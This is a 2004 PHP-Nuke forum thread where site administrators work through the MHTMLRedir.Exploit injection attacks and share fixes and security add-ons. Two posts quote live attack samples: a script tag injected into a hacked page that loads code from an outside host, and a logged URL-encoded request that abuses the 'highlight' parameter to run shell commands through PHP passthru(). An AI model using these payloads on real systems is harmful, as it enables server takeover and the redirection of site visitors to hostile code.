You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 163 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - MHTMLRedir.Exploit [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Sat Nov 20, 2004 7:47 pm Reply with quoteBack to top

I have the latest Protector, and I don't think it was caught by it as Protector is called before Admin Secure

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
VinDSL
Site Admin
Site Admin


Joined: Jul 08, 2003
Posts: 1193

Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs

PostPosted: Sat Nov 20, 2004 10:30 pm Reply with quoteBack to top

sting wrote:
...looks like someone found another sql injection exploit...

Agreed! It's coming up on everyone's radar lately. I'm gonna 'sticky' this...

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
Find all posts by VinDSLView user's profileSend private messageVisit poster's websiteICQ Number
VinDSL
Site Admin
Site Admin


Joined: Jul 08, 2003
Posts: 1193

Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs

PostPosted: Sat Nov 20, 2004 11:04 pm Reply with quoteBack to top

From what I've been reading, this is an accurate description...

Image

One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit. Rolling Eyes

LoL! FireFox is looking better all the time, no? Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
Find all posts by VinDSLView user's profileSend private messageVisit poster's websiteICQ Number
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Sun Nov 21, 2004 10:19 am Reply with quoteBack to top

After removing the code above from the Nuke-theme footer as described above I checked out some other non-nuke sites that I have on the same domain and found the same code attached to almost every file that had footer in the file name.

One good thing came out of this for me anyway - it scared me enough to "get moving" on upgrading from 7.1 - 7.5 to eliminate the web mail tables and files.
Find all posts by maczan1205View user's profileSend private message
lilacskn
Nuke Soldier
Nuke Soldier


Joined: Mar 11, 2004
Posts: 10

Location: Maine

PostPosted: Sun Nov 21, 2004 12:47 pm Reply with quoteBack to top

i am having this on my site too! it's scaring visitors away, and it's an official site...can anyone help me????

thanks so much!

here is my addy http://jeffbuckleycommunity.com


xoxo jax
Find all posts by lilacsknView user's profileSend private messageVisit poster's websiteAIM AddressYahoo Messenger
chukar
Nuke Cadet
Nuke Cadet


Joined: Nov 19, 2004
Posts: 7


PostPosted: Mon Nov 22, 2004 3:53 pm Reply with quoteBack to top

Not sure if this is the right thread or not, but I'm getting access denied messages when I try to access admin.php. I was hacked over the weekend with a MHTMLRedir.Exploit injection, and I wonder if this is related to that.

Quote:
One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit.



I fixed database problem, but now can't access admin.php.
Find all posts by chukarView user's profileSend private message
sting
Site Admin
Site Admin


Joined: Jul 24, 2003
Posts: 1986

Location: Apparently ALWAYS Online. . .

PostPosted: Mon Nov 22, 2004 8:40 pm Reply with quoteBack to top

VinDSL wrote:
From what I've been reading, this is an accurate description...


The big issue here is that some sites with Admin Secure have still been hit. I haven't actually seen what has been used for the exploit - has anyone gotten a log of it yet?

-sting

_________________
Is it paranoia if they are really out to get you?

-------------------------------------------------------
sting usually hangs out at nukehaven.net
Find all posts by stingView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Mon Nov 22, 2004 10:33 pm Reply with quoteBack to top

Weird mine hasn't with Admin Secure. I know because they've tried hundreds of times over a week period. And another week period before that. All various 61.78.61.* addresses.

Admin Secure blocks this as a Cross-Site Scripting so make sure you enable scripting protection.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
schtefan
Nuke Cadet
Nuke Cadet


Joined: Jun 14, 2004
Posts: 8


PostPosted: Wed Nov 24, 2004 9:36 am Reply with quoteBack to top

Evaders99 wrote:
These hacks were blocked by the latest Admin Secure. That's how the IP was recorded.



Is it through the Admim? Should I change it?


Last edited by schtefan on Sat Feb 03, 2007 11:45 pm; edited 1 time in total
Find all posts by schtefanView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 24, 2004 12:45 pm Reply with quoteBack to top

I'm not really sure - I'm getting an error in Admin Secure when trying to look at the specific details of this hacker. This is the only IP range that is constantly hitting my site, so I expect it is this person - but can someone confirm this?

I would apply all security measures immediately. Best chance to catch and stop this hacker. Check the sticky topic for a link to such addons.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
solentsurfer
Nuke Cadet
Nuke Cadet


Joined: Nov 25, 2004
Posts: 1


PostPosted: Thu Nov 25, 2004 2:16 pm Reply with quoteBack to top

I don't have Nuke but have an online shop using MySQL database which has been hacked with MHTMLRedir.exploit.


It appears dynamically, sometimes Nortan detects and sometimes it doesn't. When it does, the bottom address bar on IE shows that another site is trying to be opened. This happens on any page so suggests it is in the database but I cannot find it.

Does anybody have any idea where else it could be or what to look for in a non Nuke site Mad ?

Also, when it does appear this code is place just inside the bottom body tag of the page:
Code:
<script language="JavaScript" src="http://www.eagle-inspection.com/data/p.php?i=637...8b&to=http://www.iwar.org.uk/pipermail/infocon/2004-March/2004001207.html"></script>
Find all posts by solentsurferView user's profileSend private message
jacebenson
Nuke Cadet
Nuke Cadet


Joined: Nov 01, 2003
Posts: 6


PostPosted: Tue Nov 30, 2004 5:34 pm Reply with quoteBack to top

WHere is the FIX? I need the fix been hit twice.... Please someone link to Admin Secure if it fixes? Does it? What can I do? Can I lock the table they're tring to Inject? What can I do to stop them?
Find all posts by jacebensonView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Tue Nov 30, 2004 6:00 pm Reply with quoteBack to top

I don't know about the online shop. It is probably an SQL injection problem - talk to the maker of that software.

Fix:
* Again, you must manually go to your config table and delete the code from your table. Next, apply a good security addon: http://www.nukecops.com/postt37460.html

Get an IP address of this person hopefully, and ban them! *

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
sting
Site Admin
Site Admin


Joined: Jul 24, 2003
Posts: 1986

Location: Apparently ALWAYS Online. . .

PostPosted: Sun Dec 05, 2004 11:28 am Reply with quoteBack to top

Ok, think I may have found it. Make sure you have the HIGHLIGHT fix taken care of. The latest versions (2.7) of the nuke fixes seem to take care of it - for some reason on the site I monitor that was hit, sentinel was loaded but did not catch it until AFTER I had loaded the 2.7 patch.

Sentinel covers it as an abuse - script. The lastest IP to attempt it was 62.212.77.34 for those of you blocking IP's, and the script looked something like this:

Code:
www.site.com/modules.php?name=Forums&file=viewtopic&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK;


Of course, I hope this doesn't get flagged for banning when I try to submit... lol

EDIT - At the risk of splitting the nuke community once again, I am going to post a link to Raven's site. While I know that the personalities of this site and that one often clash, I feel that this information is vital to the nuke community, and rather than copy/paste, I will attempt to bring good will and better security to the nuke community during this holiday season. Or something.

Highlight fix is detailed here - http://ravenphpscripts.com/article635.html.



-sting

_________________
Is it paranoia if they are really out to get you?

-------------------------------------------------------
sting usually hangs out at nukehaven.net
Find all posts by stingView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
Fiona
Private
Private


Joined: Nov 10, 2004
Posts: 48


PostPosted: Mon Dec 06, 2004 5:57 pm Reply with quoteBack to top

sting wrote:
The latest versions (2.7) of the nuke fixes seem to take care of it

Sting: Does 2.6 handle it?

I'm on earlier versions of Nuke (6.5-7.2) using 2.6, and I can't see anything in 2.7 that significantly affects these earlier versions, which is why I haven't applied it to them.

Any idea if I'm right?

-Fi
Find all posts by FionaView user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.158 Seconds - 207 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::